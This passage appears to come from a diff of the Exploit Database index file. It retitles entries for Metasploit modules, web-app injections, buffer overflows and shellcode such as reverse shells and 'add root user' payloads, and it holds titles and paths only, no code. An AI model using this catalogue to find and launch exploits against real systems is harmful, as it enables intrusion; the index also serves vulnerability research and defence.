- URL Handling Buffer Overflow (Linux)",2010-09-20,Metasploit,linux,remote,0 +16855,platforms/linux/remote/16855.rb,"PeerCast 0.1216 (Linux) - URL Handling Buffer Overflow",2010-09-20,Metasploit,linux,remote,0 16856,platforms/cgi/webapps/16856.rb,"DD-WRT HTTP Daemon - Arbitrary Command Execution",2010-07-07,Metasploit,cgi,webapps,0 16857,platforms/cgi/webapps/16857.rb,"Alcatel-Lucent OmniPCX Enterprise - masterCGI Arbitrary Command Execution",2010-10-05,Metasploit,cgi,webapps,0 16858,platforms/php/webapps/16858.rb,"RedHat Piranha Virtual Server Package - passwd.php3 Arbitrary Command Execution",2010-10-18,Metasploit,php,webapps,0 -16859,platforms/linux/remote/16859.rb,"Samba - lsa_io_trans_names Heap Overflow (Linux)",2010-07-14,Metasploit,linux,remote,0 -16860,platforms/linux/remote/16860.rb,"Samba - chain_reply Memory Corruption (Linux x86)",2010-09-04,Metasploit,linux,remote,0 -16861,platforms/linux/remote/16861.rb,"Samba - trans2open Overflow (Linux x86)",2010-07-14,Metasploit,linux,remote,0 +16859,platforms/linux/remote/16859.rb,"Samba (Linux) - lsa_io_trans_names Heap Overflow",2010-07-14,Metasploit,linux,remote,0 +16860,platforms/linux/remote/16860.rb,"Samba (Linux/x86) - chain_reply Memory Corruption",2010-09-04,Metasploit,linux,remote,0 +16861,platforms/linux/remote/16861.rb,"Samba (Linux/x86) - trans2open Overflow Exploit",2010-07-14,Metasploit,linux,remote,0 16862,platforms/hardware/remote/16862.rb,"iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (1)",2010-09-20,Metasploit,hardware,remote,0 16863,platforms/osx/remote/16863.rb,"AppleFileServer - LoginExt PathName Overflow",2010-09-20,Metasploit,osx,remote,0 -16864,platforms/osx/remote/16864.rb,"UFO: Alien Invasion IRC Client - Buffer Overflow (OSX)",2010-10-09,Metasploit,osx,remote,0 -16865,platforms/osx/remote/16865.rb,"Arkeia Backup Client Type 77 - Overflow (Mac OS X)",2010-05-09,Metasploit,osx,remote,0 +16864,platforms/osx/remote/16864.rb,"UFO: Alien Invasion IRC Client (OSX) - Buffer Overflow",2010-10-09,Metasploit,osx,remote,0 +16865,platforms/osx/remote/16865.rb,"Arkeia Backup Client Type 77 (Mac OSX) - Overflow Exploit",2010-05-09,Metasploit,osx,remote,0 16866,platforms/unix/remote/16866.rb,"Safari - Archive Metadata Command Execution",2010-09-20,Metasploit,unix,remote,0 -16867,platforms/osx/remote/16867.rb,"Apple OS X Software Update - Command Execution",2010-09-20,Metasploit,osx,remote,0 +16867,platforms/osx/remote/16867.rb,"Apple OSX Software Update - Command Execution",2010-09-20,Metasploit,osx,remote,0 16868,platforms/hardware/remote/16868.rb,"iPhone MobileSafari LibTIFF - 'email' Buffer Overflow (2)",2010-09-20,Metasploit,hardware,remote,0 16869,platforms/hardware/remote/16869.rb,"iPhone MobileMail - LibTIFF Buffer Overflow",2010-09-20,Metasploit,hardware,remote,0 16870,platforms/multiple/remote/16870.rb,"Mail.app - Image Attachment Command Execution",2011-03-05,Metasploit,multiple,remote,0 -16871,platforms/osx/remote/16871.rb,"Mac OS X - mDNSResponder UPnP Location Overflow",2011-01-08,Metasploit,osx,remote,0 +16871,platforms/osx/remote/16871.rb,"Mac OSX - mDNSResponder UPnP Location Overflow",2011-01-08,Metasploit,osx,remote,0 16872,platforms/osx/remote/16872.rb,"WebSTAR FTP Server - USER Overflow",2010-09-20,Metasploit,osx,remote,0 -16873,platforms/osx/remote/16873.rb,"MacOS X - QuickTime RTSP Content-Type Overflow",2010-10-09,Metasploit,osx,remote,0 -16874,platforms/osx/remote/16874.rb,"MacOS X - EvoCam HTTP GET Buffer Overflow",2010-10-09,Metasploit,osx,remote,0 -16875,platforms/osx/remote/16875.rb,"Samba - lsa_io_trans_names Heap Overflow (OSX)",2010-04-05,Metasploit,osx,remote,0 -16876,platforms/osx_ppc/remote/16876.rb,"Samba (Mac OS X PPC) - trans2open Overflow",2010-06-21,Metasploit,osx_ppc,remote,0 +16873,platforms/osx/remote/16873.rb,"MacOSX - QuickTime RTSP Content-Type Overflow",2010-10-09,Metasploit,osx,remote,0 +16874,platforms/osx/remote/16874.rb,"MacOSX - EvoCam HTTP GET Buffer Overflow",2010-10-09,Metasploit,osx,remote,0 +16875,platforms/osx/remote/16875.rb,"Samba (OSX) - lsa_io_trans_names Heap Overflow",2010-04-05,Metasploit,osx,remote,0 +16876,platforms/osx_ppc/remote/16876.rb,"Samba (Mac OSX PPC) - trans2open Overflow",2010-06-21,Metasploit,osx_ppc,remote,0 16877,platforms/irix/remote/16877.rb,"Irix LPD tagprinter - Command Execution",2010-10-06,Metasploit,irix,remote,0 -16878,platforms/linux/remote/16878.rb,"ProFTPD 1.3.2rc3 < 1.3.3b - Telnet IAC Buffer Overflow (FreeBSD)",2010-12-02,Metasploit,linux,remote,0 +16878,platforms/linux/remote/16878.rb,"ProFTPD 1.3.2rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow",2010-12-02,Metasploit,linux,remote,0 16879,platforms/freebsd/remote/16879.rb,"XTACACSD 4.1.2 - report() Buffer Overflow",2010-05-09,Metasploit,freebsd,remote,0 -16880,platforms/linux/remote/16880.rb,"Samba trans2open - Overflow (*BSD x86)",2010-06-17,Metasploit,linux,remote,0 +16880,platforms/linux/remote/16880.rb,"Samba trans2open (*BSD/x86) - Overflow Exploit",2010-06-17,Metasploit,linux,remote,0 16881,platforms/php/webapps/16881.rb,"Cacti - graph_view.php Remote Command Execution",2010-07-03,Metasploit,php,webapps,0 16882,platforms/php/webapps/16882.rb,"PHP XML-RPC - Arbitrary Code Execution",2010-07-25,Metasploit,php,webapps,0 16883,platforms/php/webapps/16883.rb,"Simple PHP Blog 0.4.0 - Remote Command Execution",2010-07-25,Metasploit,php,webapps,0 @@ -14695,7 +14695,7 @@ id,file,description,date,author,platform,type,port 16892,platforms/php/webapps/16892.rb,"TWiki History TWikiUsers - rev Parameter Command Execution",2010-07-03,Metasploit,php,webapps,0 16893,platforms/cgi/webapps/16893.rb,"Barracuda - IMG.pl Remote Command Execution",2010-04-30,Metasploit,cgi,webapps,0 16894,platforms/php/webapps/16894.rb,"TWiki Search Function - Arbitrary Command Execution",2010-07-03,Metasploit,php,webapps,0 -16895,platforms/php/webapps/16895.rb,"WordPress cache_lastpostdate - Arbitrary Code Execution",2010-07-03,Metasploit,php,webapps,0 +16895,platforms/php/webapps/16895.rb,"Wordpress cache_lastpostdate - Arbitrary Code Execution",2010-07-03,Metasploit,php,webapps,0 16896,platforms/php/webapps/16896.rb,"vBulletin - misc.php Template Name Arbitrary Code Execution",2010-07-25,Metasploit,php,webapps,0 16897,platforms/php/webapps/16897.rb,"BASE - base_qry_common Remote File Inclusion",2010-11-24,Metasploit,php,webapps,0 16899,platforms/php/webapps/16899.rb,"osCommerce 2.2 - Arbitrary PHP Code Execution",2010-07-03,Metasploit,php,webapps,0 @@ -14744,7 +14744,7 @@ id,file,description,date,author,platform,type,port 16943,platforms/windows/dos/16943.pl,"Movavi VideoSuite 8.0 SlideShow - .jpg Local Crash PoC",2011-03-08,KedAns-Dz,windows,dos,0 16944,platforms/windows/dos/16944.pl,"Movavi VideoSuite 8.0 Movie Editor - .avi Local Crash PoC",2011-03-08,KedAns-Dz,windows,dos,0 16945,platforms/hardware/dos/16945.pl,"Nokia N97 - .m3u Playlist Crash PoC",2011-03-08,KedAns-Dz,hardware,dos,0 -16947,platforms/php/webapps/16947.txt,"GRAND Flash Album Gallery 0.55 WordPress Plugin - Multiple Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0 +16947,platforms/php/webapps/16947.txt,"GRAND Flash Album Gallery 0.55 Wordpress Plugin - Multiple Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0 16948,platforms/php/webapps/16948.txt,"Esselbach Storyteller CMS System 1.8 - SQL Injection",2011-03-09,Shamus,php,webapps,0 16949,platforms/php/webapps/16949.php,"maian weblog 4.0 - Blind SQL Injection",2011-03-09,mr_me,php,webapps,0 16950,platforms/php/webapps/16950.txt,"recordpress 0.3.1 - Multiple Vulnerabilities",2011-03-09,"Khashayar Fereidani",php,webapps,0 @@ -14842,7 +14842,7 @@ id,file,description,date,author,platform,type,port 17053,platforms/windows/remote/17053.txt,"wodWebServer.NET 1.3.3 - Directory Traversal",2011-03-27,"AutoSec Tools",windows,remote,0 17054,platforms/php/webapps/17054.txt,"webedition CMS 6.1.0.2 - Multiple Vulnerabilities",2011-03-27,"AutoSec Tools",php,webapps,0 17055,platforms/php/webapps/17055.txt,"Honey Soft Web Solution - Multiple Vulnerabilities",2011-03-28,**RoAd_KiLlEr**,php,webapps,0 -17056,platforms/php/webapps/17056.txt,"WordPress Plugin BackWPup - Remote Code Execution /Local Code Execution",2011-03-28,"Sense of Security",php,webapps,0 +17056,platforms/php/webapps/17056.txt,"Wordpress Plugin BackWPup - Remote Code Execution /Local Code Execution",2011-03-28,"Sense of Security",php,webapps,0 17057,platforms/php/webapps/17057.txt,"webEdition CMS - Local File Inclusion",2011-03-28,eidelweiss,php,webapps,0 17058,platforms/linux/remote/17058.rb,"Distributed Ruby - Send instance_eval/syscall Code Execution",2011-03-27,Metasploit,linux,remote,0 17061,platforms/php/webapps/17061.txt,"Andy's PHP Knowledgebase Project 0.95.4 - SQL Injection",2011-03-29,"AutoSec Tools",php,webapps,0 @@ -14899,7 +14899,7 @@ id,file,description,date,author,platform,type,port 17116,platforms/hardware/webapps/17116.txt,"Longshine Multiple Print Servers - Cross-Site Scripting",2011-04-04,b0telh0,hardware,webapps,0 17117,platforms/hardware/webapps/17117.txt,"Planet FPS-1101 - Cross-Site Scripting",2011-04-04,b0telh0,hardware,webapps,0 17118,platforms/php/webapps/17118.txt,"OpenEMR 4.0.0 - Multiple Vulnerabilities",2011-04-05,"AutoSec Tools",php,webapps,0 -17119,platforms/php/webapps/17119.txt,"WordPress Plugin Custom Pages 0.5.0.1 - Local File Inclusion",2011-04-05,"AutoSec Tools",php,webapps,0 +17119,platforms/php/webapps/17119.txt,"Wordpress Plugin Custom Pages 0.5.0.1 - Local File Inclusion",2011-04-05,"AutoSec Tools",php,webapps,0 17120,platforms/multiple/dos/17120.c,"GNU glibc < 2.12.2 - 'fnmatch()' Function Stack Corruption",2011-02-25,"Simon Berry-Byrne",multiple,dos,0 17181,platforms/linux/remote/17181.pl,"FiSH-irssi 0.99 - Evil ircd Buffer Overflow",2011-04-17,"Caleb James DeLisle",linux,remote,0 17124,platforms/windows/local/17124.pl,"MPlayer (r33064 Lite) - Buffer Overflow + ROP Exploit",2011-04-06,Nate_M,windows,local,0 @@ -14919,7 +14919,7 @@ id,file,description,date,author,platform,type,port 17179,platforms/php/webapps/17179.txt,"Bedder CMS - Blind SQL Injection",2011-04-16,^Xecuti0N3r,php,webapps,0 17180,platforms/php/webapps/17180.txt,"Shape Web Solutions CMS - SQL Injection",2011-04-16,"Ashiyane Digital Security Team",php,webapps,0 17140,platforms/multiple/dos/17140.txt,"Libmodplug ReadS3M - Stack Overflow",2011-04-09,"SEC Consult",multiple,dos,0 -17141,platforms/php/webapps/17141.txt,"Point Market System 3.1x vbulletin plugin - SQL Injection",2011-04-10,Net.Edit0r,php,webapps,0 +17141,platforms/php/webapps/17141.txt,"Point Market System 3.1x vBulletin plugin - SQL Injection",2011-04-10,Net.Edit0r,php,webapps,0 17142,platforms/windows/dos/17142.py,"IrfanView 4.28 - ICO With Transparent Colour Denial of Service & RDenial of Service",2011-04-10,BraniX,windows,dos,0 17143,platforms/windows/dos/17143.py,"IrfanView 4.28 - ICO Without Transparent Colour Denial of Service & RDenial of Service",2011-04-10,BraniX,windows,dos,0 17144,platforms/windows/local/17144.pl,"MikeyZip 1.1 - '.zip' Buffer Overflow",2011-04-10,"C4SS!0 G0M3S",windows,local,0 @@ -14963,7 +14963,7 @@ id,file,description,date,author,platform,type,port 17191,platforms/php/webapps/17191.txt,"Ultimate eShop - Error Based SQL Injection",2011-04-20,Romka,php,webapps,0 17192,platforms/php/webapps/17192.html,"docuFORM Mercury WebApp 6.16a/5.20 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-20,LiquidWorm,php,webapps,0 17193,platforms/php/webapps/17193.html,"SocialCMS1.0.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2011-04-20,"vir0e5 ",php,webapps,0 -17194,platforms/lin_x86/shellcode/17194.txt,"Linux/x86 - netcat bindshell port 6666 shellcode (69 bytes)",2011-04-21,"Jonathan Salwan",lin_x86,shellcode,0 +17194,platforms/lin_x86/shellcode/17194.txt,"Linux/x86 - netcat bindshell port 6666 Shellcode (69 bytes)",2011-04-21,"Jonathan Salwan",lin_x86,shellcode,0 17195,platforms/windows/remote/17195.rb,"Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (2)",2011-04-19,Metasploit,windows,remote,0 17199,platforms/unix/remote/17199.rb,"Spreecommerce < 0.50.0 - Arbitrary Command Execution",2011-04-21,Metasploit,unix,remote,0 17200,platforms/php/webapps/17200.txt,"ZenPhoto 1.4.0.3 - x-forwarded-for HTTP Header presisitent Cross-Site Scripting",2011-04-22,Saif,php,webapps,0 @@ -14973,11 +14973,11 @@ id,file,description,date,author,platform,type,port 17204,platforms/php/webapps/17204.txt,"DynMedia Pro Web CMS 4.0 - Local File Disclosure",2011-04-22,Mbah_Semar,php,webapps,0 17205,platforms/php/webapps/17205.txt,"4Images 1.7.9 - Multiple Vulnerabilities",2011-04-22,"High-Tech Bridge SA",php,webapps,0 17206,platforms/php/webapps/17206.txt,"Realmarketing CMS - Multiple SQL Injections",2011-04-22,^Xecuti0N3r,php,webapps,0 -17207,platforms/php/webapps/17207.txt,"WordPress Plugin ajax category dropdown 0.1.5 - Multiple Vulnerabilities",2011-04-22,"High-Tech Bridge SA",php,webapps,0 +17207,platforms/php/webapps/17207.txt,"Wordpress Plugin ajax category dropdown 0.1.5 - Multiple Vulnerabilities",2011-04-22,"High-Tech Bridge SA",php,webapps,0 17211,platforms/php/webapps/17211.txt,"mySeatXT 0.1781 - SQL Injection",2011-04-25,"AutoSec Tools",php,webapps,0 17212,platforms/php/webapps/17212.txt,"OrangeHRM 2.6.3 - (PluginController.php) Local File Inclusion",2011-04-25,"AutoSec Tools",php,webapps,0 17213,platforms/php/webapps/17213.txt,"phpmychat plus 1.93 - Multiple Vulnerabilities",2011-04-25,"AutoSec Tools",php,webapps,0 -17214,platforms/php/webapps/17214.php,"WordPress SermonBrowser Plugin 0.43 - SQL Injection",2011-04-26,Ma3sTr0-Dz,php,webapps,0 +17214,platforms/php/webapps/17214.php,"Wordpress SermonBrowser Plugin 0.43 - SQL Injection",2011-04-26,Ma3sTr0-Dz,php,webapps,0 17215,platforms/hardware/webapps/17215.txt,"Snom IP Phone Web Interface < 8 - Multiple Vulnerabilities",2011-04-26,"Yakir Wizman",hardware,webapps,0 17216,platforms/php/webapps/17216.txt,"Quick.CMS 3.0 - Cross-Site Request Forgery",2011-04-26,^Xecuti0N3r,php,webapps,0 17217,platforms/windows/local/17217.py,"Subtitle Processor 7.7.1 - SEH Unicode Buffer Overflow",2011-04-27,"Brandon Murphy",windows,local,0 @@ -14987,12 +14987,12 @@ id,file,description,date,author,platform,type,port 17221,platforms/php/webapps/17221.txt,"kusaba x 0.9.1 - Multiple Vulnerabilities",2011-04-28,"Emilio Pinna",php,webapps,0 17222,platforms/linux/dos/17222.c,"libmodplug 0.8.8.2 - (.abc) Stack-Based Buffer Overflow PoC",2011-04-28,epiphant,linux,dos,0 17223,platforms/windows/local/17223.pl,"NetOp Remote Control 8.0 / 9.1 / 9.2 / 9.5 - Buffer Overflow",2011-04-28,chap0,windows,local,0 -17224,platforms/osx/shellcode/17224.s,"OS-X/Intel (x86_64) - reverse_tcp shell shellcode (131 bytes)",2011-04-29,hammackj,osx,shellcode,0 +17224,platforms/osx/shellcode/17224.s,"OS-X/Intel (x86_64) - reverse_tcp shell Shellcode (131 bytes)",2011-04-29,hammackj,osx,shellcode,0 17225,platforms/windows/local/17225.rb,"Subtitle Processor 7.7.1 - '.m3u' SEH Unicode Buffer Overflow",2011-04-28,Metasploit,windows,local,0 17226,platforms/php/webapps/17226.txt,"phpGraphy 0.9.13b - Multiple Vulnerabilities",2011-04-29,"High-Tech Bridge SA",php,webapps,0 17227,platforms/windows/dos/17227.py,"Microsoft Excel - Axis Properties Record Parsing Buffer Overflow PoC",2011-04-29,webDEViL,windows,dos,0 17228,platforms/asp/webapps/17228.txt,"SOOP Portal Raven 1.0b - SQL Injection",2011-04-29,Evil-Thinker,asp,webapps,0 -17229,platforms/windows/local/17229.rb,"MJM QuickPlayer 1.00 beta 60a / QuickPlayer 2010 - (.s3m) Stack Buffer Overflow",2011-04-30,Metasploit,windows,local,0 +17229,platforms/windows/local/17229.rb,"MJM QuickPlayer 1.00 Beta 60a / QuickPlayer 2010 - (.s3m) Stack Buffer Overflow",2011-04-30,Metasploit,windows,local,0 17230,platforms/windows/local/17230.rb,"MJM Core Player 2011 - (.s3m) Stack Buffer Overflow",2011-04-30,Metasploit,windows,local,0 17231,platforms/php/webapps/17231.txt,"Parnian Opendata CMS - SQL Injection",2011-05-02,Alexander,php,webapps,0 17243,platforms/windows/remote/17243.txt,"SPlayer 3.7 - (build 2055) Buffer Overflow",2011-05-04,xsploitedsec,windows,remote,0 @@ -15027,7 +15027,7 @@ id,file,description,date,author,platform,type,port 17275,platforms/windows/local/17275.pl,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass",2011-05-12,h1ch4m,windows,local,0 17276,platforms/windows/webapps/17276.txt,"Oracle GlassFish Server - Administration Console Authentication Bypass",2011-05-12,"Core Security",windows,webapps,0 17279,platforms/hardware/remote/17279.txt,"DreamBox DM500(+) - Arbitrary File Download",2011-05-13,LiquidWorm,hardware,remote,0 -17284,platforms/php/webapps/17284.txt,"EditorMonkey WordPress Plugin 2.5 - (FCKeditor) Arbitrary File Upload",2011-05-14,kaMtiEz,php,webapps,0 +17284,platforms/php/webapps/17284.txt,"EditorMonkey Wordpress Plugin 2.5 - (FCKeditor) Arbitrary File Upload",2011-05-14,kaMtiEz,php,webapps,0 17285,platforms/php/webapps/17285.php,"osCommerce 2.3.1 - (banner_manager.php) Remote File Upload",2011-05-14,"Number 7",php,webapps,0 17287,platforms/windows/dos/17287.mid,"Winamp 5.61 - 'in_midi' component heap Overflow (crash only)",2011-05-15,"Alexander Gavrun",windows,dos,0 17288,platforms/php/webapps/17288.txt,"Joomla Component com_question - SQL Injection",2011-05-15,"NeX HaCkEr",php,webapps,0 @@ -15041,7 +15041,7 @@ id,file,description,date,author,platform,type,port 17296,platforms/php/webapps/17296.txt,"NoticeBoardPro 1.0 - Multiple Vulnerabilities",2011-05-16,"AutoSec Tools",php,webapps,0 17297,platforms/php/webapps/17297.txt,"Jcow 4.2.1 - Local File Inclusion",2011-05-16,"AutoSec Tools",php,webapps,0 17298,platforms/netware/dos/17298.txt,"Novell Netware eDirectory - Denial of Service",2011-05-16,nSense,netware,dos,0 -17299,platforms/php/webapps/17299.txt,"WordPress Plugin Is-human 1.4.2 - Remote Command Execution",2011-05-17,neworder,php,webapps,0 +17299,platforms/php/webapps/17299.txt,"Wordpress Plugin Is-human 1.4.2 - Remote Command Execution",2011-05-17,neworder,php,webapps,0 17300,platforms/windows/remote/17300.rb,"7-Technologies IGSS 9.00.00 b11063 - IGSSdataServer.exe Stack Overflow",2011-05-16,Metasploit,windows,remote,0 17302,platforms/windows/local/17302.py,"Sonique 1.96 - '.m3u' Buffer Overflow",2011-05-17,sinfulsecurity,windows,local,0 17301,platforms/php/webapps/17301.txt,"Pligg 1.1.4 - SQL Injection",2011-05-17,Null-0x00,php,webapps,0 @@ -15059,8 +15059,8 @@ id,file,description,date,author,platform,type,port 17316,platforms/php/webapps/17316.txt,"PHPortfolio - SQL Injection",2011-05-23,lionaneesh,php,webapps,0 17320,platforms/php/webapps/17320.txt,"i-doIT 0.9.9-4 - Local File Inclusion",2011-05-25,"AutoSec Tools",php,webapps,0 17321,platforms/php/webapps/17321.txt,"ExtCalendar 2.0b2 - (cal_search.php) SQL Injection",2011-05-25,"High-Tech Bridge SA",php,webapps,0 -17322,platforms/php/webapps/17322.txt,"egroupware 1.8.001.20110421 - Multiple Vulnerabilities",2011-05-25,"AutoSec Tools",php,webapps,0 -20195,platforms/lin_x86/shellcode/20195.c,"Linux/x86 - ASLR deactivation shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0 +17322,platforms/php/webapps/17322.txt,"eGroupWare 1.8.001.20110421 - Multiple Vulnerabilities",2011-05-25,"AutoSec Tools",php,webapps,0 +20195,platforms/lin_x86/shellcode/20195.c,"Linux/x86 - ASLR deactivation Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0 17324,platforms/php/webapps/17324.rb,"AWStats Totals 1.14 multisort - Remote Command Execution",2011-05-25,Metasploit,php,webapps,0 17325,platforms/php/webapps/17325.py,"Clipbucket 2.4 RC2 645 - SQL Injection",2011-05-26,"AutoSec Tools",php,webapps,0 17326,platforms/windows/shellcode/17326.rb,"Windows - DNS Reverse Download and Exec Shellcode (Metasploit)",2011-05-26,"Alexey Sintsov",windows,shellcode,0 @@ -15096,16 +15096,16 @@ id,file,description,date,author,platform,type,port 17365,platforms/windows/remote/17365.py,"IBM Tivoli Endpoint 4.1.1 - Remote SYSTEM Exploit",2011-06-07,"Jeremy Brown",windows,remote,0 17366,platforms/windows/remote/17366.rb,"Cisco AnyConnect VPN Client - ActiveX URL Property Download and Execute",2011-06-06,Metasploit,windows,remote,0 17367,platforms/php/webapps/17367.html,"Dataface - Local File Inclusion",2011-06-07,ITSecTeam,php,webapps,0 -17371,platforms/lin_x86/shellcode/17371.txt,"Linux/x86 - ConnectBack with SSL connection shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",lin_x86,shellcode,0 +17371,platforms/lin_x86/shellcode/17371.txt,"Linux/x86 - ConnectBack with SSL connection Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",lin_x86,shellcode,0 17373,platforms/windows/remote/17373.py,"ActFax Server FTP - Remote Buffer Overflow (post-auth) Bigger Buffer",2011-06-08,b33f,windows,remote,0 17372,platforms/windows/dos/17372.txt,"VLC Media Player - XSPF Local File Integer Overflow in XSPF playlist parser",2011-06-08,TecR0c,windows,dos,0 17374,platforms/windows/remote/17374.rb,"7-Technologies IGSS 9 - IGSSdataServer .Rms Rename Buffer Overflow",2011-06-09,Metasploit,windows,remote,0 17375,platforms/asp/webapps/17375.txt,"EquiPCS - SQL Injection",2011-06-09,Sideswipe,asp,webapps,0 17376,platforms/hardware/webapps/17376.txt,"Aastra IP Phone 9480i - Web Interface Data disclosure",2011-06-09,"Yakir Wizman",hardware,webapps,0 -17377,platforms/hardware/webapps/17377.txt,"Polycom IP Phone Web Interface - Data Disclosure",2011-06-09,"Yakir Wizman",hardware,webapps,0 +17377,platforms/hardware/webapps/17377.txt,"Polycom IP Phone - Web Interface Data Disclosure",2011-06-09,"Yakir Wizman",hardware,webapps,0 17378,platforms/php/webapps/17378.py,"Pacer Edition CMS 2.1 - (rm) Arbitrary File Deletion Exploit",2011-06-10,LiquidWorm,php,webapps,0 17379,platforms/php/webapps/17379.txt,"Pacer Edition CMS 2.1 - (l parameter) Local File Inclusion",2011-06-10,LiquidWorm,php,webapps,0 -17380,platforms/php/webapps/17380.txt,"Angora Guestbook 1.5 - Local File Inclusion",2011-06-10,"AutoSec Tools",php,webapps,0 +17380,platforms/php/webapps/17380.txt,"Angora GuestBook 1.5 - Local File Inclusion",2011-06-10,"AutoSec Tools",php,webapps,0 17381,platforms/windows/remote/17381.txt,"simple web-server 1.2 - Directory Traversal",2011-06-10,"AutoSec Tools",windows,remote,0 17382,platforms/windows/webapps/17382.txt,"Tele Data Contact Management Server - Directory Traversal",2011-06-10,"AutoSec Tools",windows,webapps,0 17383,platforms/windows/local/17383.py,"The KMPlayer 3.0.0.1440 - (.mp3) Buffer Overflow (Windows 7 + ASLR Bypass)",2011-06-11,xsploitedsec,windows,local,0 @@ -15144,7 +15144,7 @@ id,file,description,date,author,platform,type,port 17419,platforms/windows/remote/17419.zip,"Mozilla Firefox - 'nsTreeRange' Dangling Pointer Exploit",2011-06-20,Abysssec,windows,remote,0 17421,platforms/windows/dos/17421.py,"XnView 1.98 - Denial of Service PoC",2011-06-20,BraniX,windows,dos,0 17422,platforms/hardware/remote/17422.txt,"DreamBox DM800 - Arbitrary File Download",2011-06-21,ShellVision,hardware,remote,0 -17423,platforms/php/webapps/17423.txt,"WPtouch WordPress Plugin 1.9.27 - URL redirection",2011-06-21,MaKyOtOx,php,webapps,0 +17423,platforms/php/webapps/17423.txt,"WPtouch Wordpress Plugin 1.9.27 - URL redirection",2011-06-21,MaKyOtOx,php,webapps,0 17424,platforms/windows/remote/17424.rb,"Black Ice Cover Page - ActiveX Control Arbitrary File Download",2011-06-21,Metasploit,windows,remote,0 17426,platforms/php/webapps/17426.txt,"iGiveTest 2.1.0 - SQL Injection",2011-06-21,"Brendan Coles",php,webapps,0 17428,platforms/php/webapps/17428.txt,"Cachelogic Expired Domains Script 1.0 - Multiple Vulnerabilities",2011-06-22,"Brendan Coles",php,webapps,0 @@ -15155,7 +15155,7 @@ id,file,description,date,author,platform,type,port 17436,platforms/php/webapps/17436.txt,"iSupport 1.8 - SQL Injection",2011-06-23,"Brendan Coles",php,webapps,0 17437,platforms/jsp/webapps/17437.txt,"ManageEngine ServiceDesk Plus 8.0 - Directory Traversal",2011-06-23,"Keith Lee",jsp,webapps,0 17438,platforms/windows/remote/17438.txt,"IBM Web Application Firewall - Bypass",2011-06-23,"Trustwave's SpiderLabs",windows,remote,0 -17439,platforms/sh4/shellcode/17439.c,"Linux/SuperH (sh4) - Add root user 'shell-storm' with password 'toor' shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",sh4,shellcode,0 +17439,platforms/sh4/shellcode/17439.c,"Linux/SuperH (sh4) - Add root user 'shell-storm' with password 'toor' Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",sh4,shellcode,0 17441,platforms/windows/local/17441.py,"FreeAmp 2.0.7 - (.fat) Buffer Overflow",2011-06-23,"Iván García Ferreira",windows,local,0 17442,platforms/jsp/webapps/17442.txt,"manageengine support center plus 7.8 build 7801 - Directory Traversal",2011-06-23,xistence,jsp,webapps,0 17443,platforms/cgi/webapps/17443.txt,"ActivDesk 3.0 - Multiple security vulnerabilities",2011-06-23,"Brendan Coles",cgi,webapps,0 @@ -15167,7 +15167,7 @@ id,file,description,date,author,platform,type,port 17448,platforms/windows/remote/17448.rb,"Lotus Notes 8.0.x < 8.5.2 FP2 - Autonomy Keyview (.lzh attachment)",2011-06-23,Metasploit,windows,remote,0 17451,platforms/windows/local/17451.rb,"Microsoft Visio - VISIODWG.dll DXF File Handling",2011-06-26,Metasploit,windows,local,0 17452,platforms/php/webapps/17452.txt,"JoomlaXi - Persistent Cross-Site Scripting",2011-06-26,"Karthik R",php,webapps,0 -17453,platforms/php/webapps/17453.txt,"WordPress Beer Recipes Plugin 1.0 - Cross-Site Scripting",2011-06-26,TheUzuki.',php,webapps,0 +17453,platforms/php/webapps/17453.txt,"Wordpress Beer Recipes Plugin 1.0 - Cross-Site Scripting",2011-06-26,TheUzuki.',php,webapps,0 17457,platforms/php/webapps/17457.txt,"rgboard 4.2.1 - SQL Injection",2011-06-28,hamt0ry,php,webapps,0 17458,platforms/windows/dos/17458.txt,"HP Data Protector 6.20 - Multiple Vulnerabilities",2011-06-29,"Core Security",windows,dos,0 17459,platforms/windows/local/17459.txt,"Valve Steam Client Application 1559/1559 - Privilege Escalation",2011-06-29,LiquidWorm,windows,local,0 @@ -15176,7 +15176,7 @@ id,file,description,date,author,platform,type,port 17462,platforms/freebsd/remote/17462.txt,"FreeBSD OpenSSH 3.5p1 - Remote Root Exploit",2011-06-30,kingcope,freebsd,remote,0 17463,platforms/linux/dos/17463.pl,"Rhythmbox - '.m3u' Local Crash PoC",2011-06-30,Caddy-Dz,linux,dos,0 17464,platforms/php/webapps/17464.txt,"Joomla mdigg Component - SQL Injection",2011-07-01,"Caddy Dz",php,webapps,0 -17465,platforms/php/webapps/17465.txt,"WordPress 3.1.3 - SQL Injection",2011-07-01,"SEC Consult",php,webapps,0 +17465,platforms/php/webapps/17465.txt,"Wordpress 3.1.3 - SQL Injection",2011-07-01,"SEC Consult",php,webapps,0 17466,platforms/php/webapps/17466.txt,"Ollance Member Login Script - Multiple Vulnerabilities",2011-07-01,"$#4d0\/\/[r007k17]",php,webapps,0 17467,platforms/windows/remote/17467.rb,"HP - OmniInet.exe Opcode 27 Buffer Overflow",2011-07-01,Metasploit,windows,remote,5555 17468,platforms/windows/remote/17468.py,"HP Data Protector 6.11 - Remote Buffer Overflow (DEP Bypass)",2011-07-02,"muts and dookie",windows,remote,5555 @@ -15253,10 +15253,10 @@ id,file,description,date,author,platform,type,port 17549,platforms/multiple/dos/17549.txt,"Lotus Domino SMTP Router & Email Server and Client - Denial of Service",2011-07-19,Unknown,multiple,dos,0 17550,platforms/windows/remote/17550.py,"FreeFloat FTP Server 1.0 - ACCL Buffer Overflow",2011-07-19,mortis,windows,remote,0 17551,platforms/jsp/webapps/17551.txt,"Oracle Sun GlassFish Enterprise Server - Persistent Cross-Site Scripting",2011-07-20,"Sense of Security",jsp,webapps,0 -17555,platforms/php/webapps/17555.txt,"Vbulletin 4.0.x 4.1.3 - (messagegroupid) SQL Injection",2011-07-21,fb1h2s,php,webapps,0 +17555,platforms/php/webapps/17555.txt,"vBulletin 4.0.x 4.1.3 - (messagegroupid) SQL 